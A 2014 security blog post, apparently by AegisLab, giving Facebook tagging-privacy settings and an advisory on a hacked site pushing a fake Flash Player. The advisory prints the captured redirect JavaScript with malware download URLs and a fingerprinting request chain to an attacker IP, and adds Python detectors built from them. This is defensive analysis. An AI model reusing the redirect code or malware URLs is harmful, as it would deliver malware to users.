Knowledge Sharing: Guarding Against Malicious Behavior
Strengthen your Facebook privacy settings so that annoying shopping pages cannot tag you
Also important: beware of a fake, malicious Adobe website that looks 100% real and stays in sync with the original
Security Advisory 2014-02-27
Many shopping fan pages that tag people have been showing up on the wall.
They sell all sorts of goods: shoes, clothes, bags and so on, and each product photo carries a Line ID.
The most annoying part is that every photo tags a large number of people, so it keeps appearing on your Facebook wall.
Look closely and you will see that everyone tagged in these photos was tagged by the same person (see the image below).
It turns out that the account of the person who tagged everyone in the photo had been stolen.
Once a hacker has stolen an account, it is used to tag the owner's friends in the photos of those shopping fan pages.
AegisLab offers a few simple settings here so that these shopping pages can no longer bother you with tags.
1) First, open "Timeline and Tagging" in your Facebook account settings.
We will set two options: "Who can add things to my timeline?" and "How can I manage tags people add and tagging suggestions?"
2) Set "Who can add things to my timeline?"
Who can post on your timeline?
You can choose "Friends" or "Only Me".
Set it to "Only Me" and you no longer need to worry about friends whose accounts were stolen posting on your wall.
Review posts friends tag you in before they appear on your timeline?
You can choose "Enabled" or "Disabled".
Set it to "Enabled", so that every post that tags you must pass your review before it appears on your timeline.
3) Set "How can I manage tags people add and tagging suggestions?"
Review tags people add to your own posts before the tags appear on Facebook?
You can choose "Enabled" or "Disabled".
Set it to "Enabled", so that when someone wants to tag you, the tag is allowed only after your review.
When you're tagged in a post, who do you want to add to the audience if they aren't already in it?
You can choose "Friends", "Only Me" or "Custom".
Set it to "Only Me", so that when you are tagged in a post, only you see that post and your friends do not.
Who sees tag suggestions when photos that look like you are uploaded?
You can choose "Friends" or "No One".
Set it to "No One", so that when a photo that looks like you is uploaded, no tag suggestion with your name appears.
Once you have followed the steps above, those annoying shopping pages need your approval before they can tag you, and only you will see the posts you are tagged in, so your Facebook friends are not affected.
The steps above only strengthen your own privacy settings. The people around you also need to know why these settings matter before the annoying advertising on Facebook walls can be reduced.
These privacy settings only treat the symptoms; good usage habits and basic security awareness are the real cure.
How do you find out which pages you have liked, and how do you unlike them?
1) Click "Activity Log".
2) Click "Likes", then "Pages and Interests".
3) Click the edit button at the top right of the page entry to "Unlike" it or to report the page.
------------------------------------------------------------------------
One more piece of important information: beware of a fake, malicious Adobe website that looks 100% real and stays in sync with the original! Security Advisory 2014-02-27

AegisLab recently found a malicious website: hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html
The path shows that the malicious js.html sits in the ckeditor directory under cpanel.
cPanel is a back-end management system that lets you administer your website through a web interface.
CKEditor is a WYSIWYG text editor used on web pages.
Vulnerabilities in these two components are reported from time to time:
cPanel Security = https://cpanel.net/category/security/
CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html
CKEditor 4.0.1 - Multiple Vulnerabilities = http://www.exploit-db.com/exploits/24530/
We suspect that problems in these two components are what allowed the hacker to place the malicious js.html in that directory.
The site first determines your browser type and version, operating system, IP, Flash version, Adobe Reader version and similar information, then redirects you to one of several URLs to download a fake Flash Player installer. Part of the source code follows:

    // Excerpt as captured; the "" operands are empty in the captured source.
    if ( "" == "Windows 8" ) {
        if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); }
        else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe" ); }
        else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe" ); }
        else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/install_flashplayer12.0.8.44.exe" ); }
        else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); }
    } else {
        if ( "" == "IE" ) {
            //alert("An update to your Adobe Flash Player is available");
            if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); }
            else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe" ); }
            else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe" ); }
            else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe" ); }
            else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); }
        } else {
            //alert("An update to your Adobe Flash Player is available");
            if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); }
            else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player non IE 11.9.9.exe" ); }
            else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer non IE 11.9.exe" ); }
            else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/installflashplayer12.0.0.44.exe" ); }
            else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); }
        }
    }

The malicious flow as tested by AegisLab:
hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html
→ hxxp://142.0.79.184/agent/agent.php?cr=ila
→ hxxp://142.0.79.184/agent/agent_check.php?ip=114.44.216.107&cr=ila
→ hxxp://142.0.79.184/agent/agent_save.php?cr=ila&Browser_Type=IE&Browser_Version=6.0&OS=Windows+XP&OS_Version=&IP=114.44.216.107&referer=&Flash=11,5,502,146&Shockwave=null&Silverlight=null&VLC=null&WindowsMediaPlayer=9,0,0,3250&PDFReader=null&AdobeReader=9,5,0,0&DevalVR=null&QuickTime=null&RealPlayer=null&IE_ActiveX=true
The fake Flash Player installer that is finally downloaded:
hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe
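The request chain above can be turned into two proxy-log checks: a request that uploads a plugin inventory, and a Flash-named executable served from outside the vendor's domains. This is an added example, not AegisLab's code; the function names, the vendor allowlist and the last sample URL are assumptions made for illustration.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Query keys taken from the agent_save.php request quoted on this page.
PLUGIN_KEYS = {"Flash", "Shockwave", "Silverlight", "VLC", "WindowsMediaPlayer",
               "PDFReader", "AdobeReader", "DevalVR", "QuickTime", "RealPlayer"}
CLIENT_KEYS = {"Browser_Type", "Browser_Version", "OS", "IP"}
# Assumption: the only domains accepted as a source of Flash installers.
VENDOR_DOMAINS = ("adobe.com", "macromedia.com")

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def classify(url):
    """Return the reasons a requested URL resembles a step of this chain."""
    parts = urlsplit(url.replace("hxxp://", "http://", 1))  # accept defanged input
    host = (parts.hostname or "").lower()
    keys = set(parse_qs(parts.query, keep_blank_values=True))
    reasons = []
    # Check 1: a request that uploads a plugin inventory plus client details.
    if len(keys & PLUGIN_KEYS) >= 3 and keys & CLIENT_KEYS:
        reasons.append("plugin inventory upload")
        if is_ip_literal(host):
            reasons.append("destination is a bare IP")
    # Check 2: an executable named after Flash served from outside the vendor.
    name = parts.path.rsplit("/", 1)[-1].lower()
    vendor = any(host == d or host.endswith("." + d) for d in VENDOR_DOMAINS)
    if name.endswith(".exe") and "flash" in name and not vendor:
        reasons.append("Flash-named installer from non-vendor host")
    return reasons

# First four: the chain quoted on this page (defanged). Last: constructed benign request.
SAMPLE = [
    "hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html",
    "hxxp://142.0.79.184/agent/agent.php?cr=ila",
    "hxxp://142.0.79.184/agent/agent_save.php?cr=ila&Browser_Type=IE"
    "&Browser_Version=6.0&OS=Windows+XP&OS_Version=&IP=114.44.216.107&referer="
    "&Flash=11,5,502,146&Shockwave=null&Silverlight=null&VLC=null"
    "&WindowsMediaPlayer=9,0,0,3250&PDFReader=null&AdobeReader=9,5,0,0"
    "&DevalVR=null&QuickTime=null&RealPlayer=null&IE_ActiveX=true",
    "hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe",
    "http://intranet.example.test/help?OS=Windows&Flash=1",
]

if __name__ == "__main__":
    print({u[:48]: classify(u) for u in SAMPLE})
```

The suffix match on the vendor domains is what keeps a look-alike host such as adobeflashupdate1.com from passing as adobe.com.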
--------------------------------
This fake Flash Player is malware. Its detection rate on VirusTotal is 23/48:
https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/
Interestingly, the host of the final PE download URL, adobeflashupdate1.com, serves a page that looks exactly like the real thing.
Is this really Adobe's official site?
The Adobe logo link at the top left even points to www.adobe.com, but the page source reveals the truth:

    <html>
    <body>
    <iframe src="http://www.adobe.com" width="100%" height="100%" frameBorder="0">
    <p>Your browser does not support iframes.</p>
    </iframe>
    </body>
    </html>

It simply embeds www.adobe.com in an iframe, which is why it looks exactly like Adobe's official site.
Detection rate of adobeflashupdate1.com on VirusTotal: 7/53 =
https://www.virustotal.com/en/url/3e8f7243be9d55d2182a6c5d26028f2721bb6ce7375c9eec37a45eff740df064/analysis/
AegisLab WebGuard has added [D]adobeflashupdate1.com to its blocking rules. Customers are reminded to keep their WebGuard signatures up to date!
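The wrapper page described above has a recognisable shape: no visible text of its own and a full-size iframe pointing at another site. The following added example (not AegisLab's code) checks fetched HTML for that shape; the class and function names and the benign sample are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

HIDDEN = {"iframe", "script", "style", "title"}  # text in these is not page body text

class FrameScan(HTMLParser):
    """Collect <iframe> attributes and count text a visitor sees outside them."""
    def __init__(self):
        super().__init__()
        self.iframes, self.hidden, self.visible_chars = [], 0, 0
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))  # attribute names arrive lowercased
        if tag in HIDDEN:
            self.hidden += 1
    def handle_endtag(self, tag):
        if tag in HIDDEN and self.hidden:
            self.hidden -= 1
    def handle_data(self, data):
        if not self.hidden:
            self.visible_chars += len(data.strip())

def same_site(a, b):
    # Simplified: same host or parent/child domain; siblings need a public-suffix list.
    return a == b or a.endswith("." + b) or b.endswith("." + a)

def wrapped_hosts(html, page_host):
    """Hosts shown through a full-size cross-site iframe on a page with no own text."""
    scan = FrameScan()
    scan.feed(html)
    scan.close()
    hosts = []
    for frame in scan.iframes:
        host = (urlsplit(frame.get("src") or "").hostname or "").lower()
        full = frame.get("width") == "100%" and frame.get("height") == "100%"
        if host and full and not same_site(host, page_host.lower()):
            hosts.append(host)
    return hosts if scan.visible_chars == 0 else []

# Markup quoted on this page for adobeflashupdate1.com.
FAKE = ('<html><body><iframe src="http://www.adobe.com" width="100%" height="100%" '
        'frameBorder="0"><p>Your browser does not support iframes.</p></iframe>'
        '</body></html>')
# Constructed benign page: text of its own plus a fixed-height embed.
BENIGN = ('<html><body><h1>Release notes</h1><iframe src="http://video.example.test/v/1" '
          'width="100%" height="315"></iframe></body></html>')

if __name__ == "__main__":
    print(wrapped_hosts(FAKE, "adobeflashupdate1.com"), wrapped_hosts(BENIGN, "blog.example.test"))
```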
===Sincerely === THE END === Melody.Blogger~===>/